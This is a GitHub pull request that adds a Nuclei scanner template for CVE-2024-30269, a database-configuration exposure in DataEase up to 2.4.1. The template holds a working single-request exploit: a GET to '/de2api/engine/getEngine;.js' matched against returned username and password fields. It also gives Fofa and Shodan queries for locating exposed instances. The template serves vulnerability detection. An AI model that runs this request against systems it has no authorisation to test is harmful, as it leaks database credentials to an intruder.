Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add CVE-2024-30269 #10849

Merged
merged 2 commits into from
Sep 30, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
41 changes: 41 additions & 0 deletions http/cves/2024/CVE-2024-30269.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
id: CVE-2024-30269

info:
name: DataEase <= 2.4.1 - Sensitive Information Exposure
author: s4e-io
severity: medium
description: |
DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.
remediation: The vulnerability has been fixed in v2.5.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-30269
- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
- https://github.com/dataease/dataease
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-30269
cwe-id: CWE-200
epss-score: 0.00043
epss-percentile: 0.09595
metadata:
verified: true
max-request: 1
vendor: dataease
product: dataease
fofa-query: body="dataease"
shodan-query: http.html:"dataease"
tags: cve,cve2024,dataease,exposure

http:
- method: GET
path:
- "{{BaseURL}}/de2api/engine/getEngine;.js"

matchers:
- type: dsl
dsl:
- 'contains_all(body, "username", "password", "port", "name\":", "pid\":")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
Loading